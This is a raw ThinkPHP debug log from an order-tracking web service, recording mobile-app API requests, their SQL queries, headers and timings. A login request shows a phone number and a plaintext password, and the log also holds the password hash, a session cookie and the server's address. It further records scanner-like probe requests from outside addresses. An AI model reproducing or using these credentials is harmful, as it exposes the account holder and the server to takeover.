RunTime:0.000354s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001011s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.000847s ] [ sql ] [ SQL ] SELECT `orderinfo`.`id`,`orderinfo`.`nei_number`,`orderinfo`.`number`,`orderinfo`.`pid`,`orderinfo`.`order_company`,`orderinfo`.`order_connect`,`orderinfo`.`order_phone`,`orderinfo`.`kehu_id`,`orderinfo`.`price`,`orderinfo`.`material_id`,`orderinfo`.`pProductinfo_id`,`orderinfo`.`productinfo_id`,`orderinfo`.`order_type`,`orderinfo`.`order_status`,`orderinfo`.`all_order_status`,`orderinfo`.`shengchan_status`,`orderinfo`.`zuixinshuoming`,`orderinfo`.`guzhangshu`,`orderinfo`.`zuixinguzhang`,`orderinfo`.`techprocess_id`,`orderinfo`.`actual_amount`,`orderinfo`.`kucun_amount`,`orderinfo`.`produce_amount`,`orderinfo`.`produced_amount`,`orderinfo`.`waste_amount`,`orderinfo`.`produced_time`,`orderinfo`.`send_amount`,`orderinfo`.`ruku_posi`,`orderinfo`.`sent_amount`,`orderinfo`.`out_time`,`orderinfo`.`build_order_staffid`,`orderinfo`.`factorymge_id`,`orderinfo`.`admin_id`,`orderinfo`.`remind_day`,`orderinfo`.`build_time`,`orderinfo`.`end_time`,`orderinfo`.`responsible_staffinfos`,`orderinfo`.`responsible_staffinfovars`,`orderinfo`.`feedback`,`orderinfo`.`guoqitime`,`orderinfo`.`guoqi_status`,`orderinfo`.`put_position`,`orderinfo`.`createtime`,`orderinfo`.`updatetime`,`orderinfo`.`is_modify`,`orderinfo`.`purchaseorder_id`,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime FROM `ot_orderinfo` `orderinfo` LEFT JOIN `ot_productinfo` `productinfo` ON `orderinfo`.`productinfo_id`=`productinfo`.`id` WHERE `orderinfo`.`factorymge_id` = 26 AND `orderinfo`.`pid` = 0 AND ( 1=1 ) AND ( order_status in ("1","2") or ( order_status = "3" and kehu_id != 0) ) ORDER BY 1765701440>orderinfo.end_time desc,1765701440>orderinfo.end_time desc,1765701440-orderinfo.end_time + orderinfo.remind_day * 24*60*60 desc, orderinfo.updatetime desc LIMIT 0,10 [ RunTime:0.024722s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_material` [ RunTime:0.001133s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000280s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000243s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000231s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000292s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000228s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000230s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000237s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000239s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000248s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000240s ] --------------------------------------------------------------- [ 2025-12-14T16:37:20+08:00 ] 39.144.91.198 POST /api/office/officeorder/getNewestOrder?userId=19&shenhe=1 [ info ] 47.105.33.115:8081/api/office/officeorder/getNewestOrder?userId=19&shenhe=1 [运行时间:0.067196s][吞吐率:14.88req/s] [内存消耗:4,831.45kb] [文件加载:77] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000032s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001159s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'office.officeorder', 2 => 'getNewestOrder', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=uil72nesf0eb2tbgeshmueif04', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'userId' => '19', 'shenhe' => '1', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001558s ] [ info ] [ RUN ] app\api\controller\office\Officeorder->getNewestOrder[ /alidata/www/gendan/application/api/controller/office/Officeorder.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000379s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.000855s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `id` = 19 LIMIT 1 [ RunTime:0.000365s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001023s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.000731s ] [ sql ] [ SQL ] SELECT `orderinfo`.`id`,`orderinfo`.`nei_number`,`orderinfo`.`number`,`orderinfo`.`pid`,`orderinfo`.`order_company`,`orderinfo`.`order_connect`,`orderinfo`.`order_phone`,`orderinfo`.`kehu_id`,`orderinfo`.`price`,`orderinfo`.`material_id`,`orderinfo`.`pProductinfo_id`,`orderinfo`.`productinfo_id`,`orderinfo`.`order_type`,`orderinfo`.`order_status`,`orderinfo`.`all_order_status`,`orderinfo`.`shengchan_status`,`orderinfo`.`zuixinshuoming`,`orderinfo`.`guzhangshu`,`orderinfo`.`zuixinguzhang`,`orderinfo`.`techprocess_id`,`orderinfo`.`actual_amount`,`orderinfo`.`kucun_amount`,`orderinfo`.`produce_amount`,`orderinfo`.`produced_amount`,`orderinfo`.`waste_amount`,`orderinfo`.`produced_time`,`orderinfo`.`send_amount`,`orderinfo`.`ruku_posi`,`orderinfo`.`sent_amount`,`orderinfo`.`out_time`,`orderinfo`.`build_order_staffid`,`orderinfo`.`factorymge_id`,`orderinfo`.`admin_id`,`orderinfo`.`remind_day`,`orderinfo`.`build_time`,`orderinfo`.`end_time`,`orderinfo`.`responsible_staffinfos`,`orderinfo`.`responsible_staffinfovars`,`orderinfo`.`feedback`,`orderinfo`.`guoqitime`,`orderinfo`.`guoqi_status`,`orderinfo`.`put_position`,`orderinfo`.`createtime`,`orderinfo`.`updatetime`,`orderinfo`.`is_modify`,`orderinfo`.`purchaseorder_id`,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime FROM `ot_orderinfo` `orderinfo` LEFT JOIN `ot_productinfo` `productinfo` ON `orderinfo`.`productinfo_id`=`productinfo`.`id` WHERE `orderinfo`.`factorymge_id` = 26 AND `orderinfo`.`pid` = 0 AND ( order_status in ("1","2") ) ORDER BY `createtime` DESC LIMIT 1 [ RunTime:0.022656s ] --------------------------------------------------------------- [ 2025-12-14T16:37:20+08:00 ] 39.144.91.198 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.022421s][吞吐率:44.60req/s] [内存消耗:2,225.99kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000039s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001266s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 8.0.0; FRD-AL10 Build/HUAWEIFRD-AL10)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T16:37:21+08:00 ] 39.144.91.198 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020079s][吞吐率:49.80req/s] [内存消耗:2,225.99kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000039s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001164s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 8.0.0; FRD-AL10 Build/HUAWEIFRD-AL10)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T16:37:57+08:00 ] 39.144.91.198 POST /api/officeorder/getOfficeHistoryOrderById?userId=19&offset=0&pageNum=10 [ info ] 47.105.33.115:8081/api/officeorder/getOfficeHistoryOrderById?userId=19&offset=0&pageNum=10 [运行时间:0.072165s][吞吐率:13.86req/s] [内存消耗:4,818.41kb] [文件加载:78] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000051s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001137s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'officeorder', 2 => 'getOfficeHistoryOrderById', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=uil72nesf0eb2tbgeshmueif04', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'userId' => '19', 'offset' => '0', 'pageNum' => '10', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001504s ] [ info ] [ RUN ] app\api\controller\Officeorder->getOfficeHistoryOrderById[ /alidata/www/gendan/application/api/controller/Officeorder.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000446s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.000946s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.000658s ] [ sql ] [ SQL ] SELECT `staffinfo`.`id`,`staffinfo`.`name`,`staffinfo`.`jobmge_id`,`staffinfo`.`accout_num`,`staffinfo`.`phone_num`,`staffinfo`.`accout_pwd`,`staffinfo`.`salt`,`staffinfo`.`staff_status`,`staffinfo`.`admin_id`,`staffinfo`.`factorymge_id`,`staffinfo`.`createtime`,`staffinfo`.`updatetime`,`staffinfo`.`portrait`,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime FROM `ot_staffinfo` `staffinfo` LEFT JOIN `ot_factorymge` `factorymge` ON `staffinfo`.`factorymge_id`=`factorymge`.`id` WHERE `staffinfo`.`id` = '19' LIMIT 1 [ RunTime:0.000437s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.000934s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.000669s ] [ sql ] [ SQL ] SELECT `orderinfo`.`id`,`orderinfo`.`nei_number`,`orderinfo`.`number`,`orderinfo`.`pid`,`orderinfo`.`order_company`,`orderinfo`.`order_connect`,`orderinfo`.`order_phone`,`orderinfo`.`kehu_id`,`orderinfo`.`price`,`orderinfo`.`material_id`,`orderinfo`.`pProductinfo_id`,`orderinfo`.`productinfo_id`,`orderinfo`.`order_type`,`orderinfo`.`order_status`,`orderinfo`.`all_order_status`,`orderinfo`.`shengchan_status`,`orderinfo`.`zuixinshuoming`,`orderinfo`.`guzhangshu`,`orderinfo`.`zuixinguzhang`,`orderinfo`.`techprocess_id`,`orderinfo`.`actual_amount`,`orderinfo`.`kucun_amount`,`orderinfo`.`produce_amount`,`orderinfo`.`produced_amount`,`orderinfo`.`waste_amount`,`orderinfo`.`produced_time`,`orderinfo`.`send_amount`,`orderinfo`.`ruku_posi`,`orderinfo`.`sent_amount`,`orderinfo`.`out_time`,`orderinfo`.`build_order_staffid`,`orderinfo`.`factorymge_id`,`orderinfo`.`admin_id`,`orderinfo`.`remind_day`,`orderinfo`.`build_time`,`orderinfo`.`end_time`,`orderinfo`.`responsible_staffinfos`,`orderinfo`.`responsible_staffinfovars`,`orderinfo`.`feedback`,`orderinfo`.`guoqitime`,`orderinfo`.`guoqi_status`,`orderinfo`.`put_position`,`orderinfo`.`createtime`,`orderinfo`.`updatetime`,`orderinfo`.`is_modify`,`orderinfo`.`purchaseorder_id`,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime FROM `ot_orderinfo` `orderinfo` LEFT JOIN `ot_productinfo` `productinfo` ON `orderinfo`.`productinfo_id`=`productinfo`.`id` WHERE `orderinfo`.`factorymge_id` = 26 AND ( 1=1 ) AND ( order_status in ("4","5") ) AND `orderinfo`.`pid` = 0 ORDER BY orderinfo.updatetime desc LIMIT 0,10 [ RunTime:0.025014s ] --------------------------------------------------------------- [ 2025-12-14T16:37:58+08:00 ] 39.144.91.198 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.019026s][吞吐率:52.56req/s] [内存消耗:2,225.99kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000038s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001112s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 8.0.0; FRD-AL10 Build/HUAWEIFRD-AL10)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T16:38:00+08:00 ] 91.224.92.109 OPTIONS / [ info ] 47.105.33.115:80/ [运行时间:0.029776s][吞吐率:33.58req/s] [内存消耗:3,333.91kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000073s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001698s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36', 'accept-encoding' => 'gzip, deflate', 'accept' => '*/*', 'connection' => 'keep-alive', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'host' => '47.105.33.115:80', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001631s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000102s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T16:38:07+08:00 ] 89.42.231.244 GET /SDK/webLanguage [ info ] 47.105.33.115:80/SDK/webLanguage [运行时间:0.020091s][吞吐率:49.77req/s] [内存消耗:2,207.57kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000037s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001127s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'SDK', 1 => 'webLanguage', 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46', 'accept-encoding' => 'gzip, deflate, gzip, deflate', 'accept' => '*/*', 'connection' => 'keep-alive', 'x-requested-with' => 'XMLHttpRequest', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'accept-language' => 'en US,en;q=0.9,sv;q=0.8', 'host' => '47.105.33.115:80', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T16:38:11+08:00 ] 39.144.91.198 POST /api/users/login?phone=13633375502&password=xm123456 [ info ] 47.105.33.115:8081/api/users/login?phone=13633375502&password=xm123456 [运行时间:0.036512s][吞吐率:27.39req/s] [内存消耗:4,306.94kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001129s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'users', 2 => 'login', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=uil72nesf0eb2tbgeshmueif04', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'phone' => '13633375502', 'password' => 'xm123456', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001551s ] [ info ] [ RUN ] app\api\controller\Users->login[ /alidata/www/gendan/application/api/controller/Users.php ] [ info ] [ DB ] INIT mysql [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'path' => '/alidata/www/gendan/runtime/temp/', 'expire' => 2592000, ) [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000400s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.001249s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `phone_num` = '13633375502' LIMIT 1 [ RunTime:0.000340s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `phone_num` = '13633375502' AND `accout_pwd` = 'ee18a8f6d7950ff1b9fac67b60155286' LIMIT 1 [ RunTime:0.000257s ] --------------------------------------------------------------- [ 2025-12-14T16:38:11+08:00 ] 39.144.91.198 POST /api/kuguan/order/getnotruorderbuid?staff_id=24&offset=0&pageNum=10 [ info ] 47.105.33.115:8081/api/kuguan/order/getnotruorderbuid?staff_id=24&offset=0&pageNum=10 [运行时间:0.071463s][吞吐率:13.99req/s] [内存消耗:4,770.27kb] [文件加载:76] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000039s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001077s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'kuguan.order', 2 => 'getnotruorderbuid', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=uil72nesf0eb2tbgeshmueif04', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'staff_id' => '24', 'offset' => '0', 'pageNum' => '10', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001460s ] [ info ] [ RUN ] app\api\controller\kuguan\Order->getnotruorderbuid[ /alidata/www/gendan/application/api/controller/kuguan/Order.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000392s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.000768s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `id` = 24 LIMIT 1 [ RunTime:0.000313s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.000911s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.000666s ] [ sql ] [ SQL ] SELECT `orderinfo`.`id`,`orderinfo`.`nei_number`,`orderinfo`.`number`,`orderinfo`.`pid`,`orderinfo`.`order_company`,`orderinfo`.`order_connect`,`orderinfo`.`order_phone`,`orderinfo`.`kehu_id`,`orderinfo`.`price`,`orderinfo`.`material_id`,`orderinfo`.`pProductinfo_id`,`orderinfo`.`productinfo_id`,`orderinfo`.`order_type`,`orderinfo`.`order_status`,`orderinfo`.`all_order_status`,`orderinfo`.`shengchan_status`,`orderinfo`.`zuixinshuoming`,`orderinfo`.`guzhangshu`,`orderinfo`.`zuixinguzhang`,`orderinfo`.`techprocess_id`,`orderinfo`.`actual_amount`,`orderinfo`.`kucun_amount`,`orderinfo`.`produce_amount`,`orderinfo`.`produced_amount`,`orderinfo`.`waste_amount`,`orderinfo`.`produced_time`,`orderinfo`.`send_amount`,`orderinfo`.`ruku_posi`,`orderinfo`.`sent_amount`,`orderinfo`.`out_time`,`orderinfo`.`build_order_staffid`,`orderinfo`.`factorymge_id`,`orderinfo`.`admin_id`,`orderinfo`.`remind_day`,`orderinfo`.`build_time`,`orderinfo`.`end_time`,`orderinfo`.`responsible_staffinfos`,`orderinfo`.`responsible_staffinfovars`,`orderinfo`.`feedback`,`orderinfo`.`guoqitime`,`orderinfo`.`guoqi_status`,`orderinfo`.`put_position`,`orderinfo`.`createtime`,`orderinfo`.`updatetime`,`orderinfo`.`is_modify`,`orderinfo`.`purchaseorder_id`,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime FROM `ot_orderinfo` `orderinfo` LEFT JOIN `ot_productinfo` `productinfo` ON `orderinfo`.`productinfo_id`=`productinfo`.`id` WHERE `orderinfo`.`pid` = 0 AND `orderinfo`.`factorymge_id` = 26 AND ( orderinfo.order_status in ('1','2') ) AND ( orderinfo.order_type in ('1','2','3') ) AND ( `productinfo`.`name` LIKE '%%' OR `responsible_staffinfovars` LIKE '%%' ) AND ( orderinfo.produce_amount > 0 ) ORDER BY 1765701491>orderinfo.end_time desc,1765701491>orderinfo.end_time desc,1765701491-orderinfo.end_time + orderinfo.remind_day * 24*60*60 desc, orderinfo.updatetime desc LIMIT 0,10 [ RunTime:0.025121s ] --------------------------------------------------------------- [ 2025-12-14T16:38:12+08:00 ] 39.144.91.198 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.019479s][吞吐率:51.34req/s] [内存消耗:2,225.99kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001141s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 8.0.0; FRD-AL10 Build/HUAWEIFRD-AL10)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T16:38:13+08:00 ] 39.144.91.198 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.019636s][吞吐率:50.93req/s] [内存消耗:2,225.99kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000049s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001251s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 8.0.0; FRD-AL10 Build/HUAWEIFRD-AL10)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T16:38:13+08:00 ] 39.144.91.198 POST /api/kuguan/order/getnotruorderbuid?staff_id=24&offset=1&pageNum=10 [ info ] 47.105.33.115:8081/api/kuguan/order/getnotruorderbuid?staff_id=24&offset=1&pageNum=10 [运行时间:0.069690s][吞吐率:14.35req/s] [内存消耗:4,761.91kb] [文件加载:76] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000043s ] [ info ] [ CACHE ] INIT 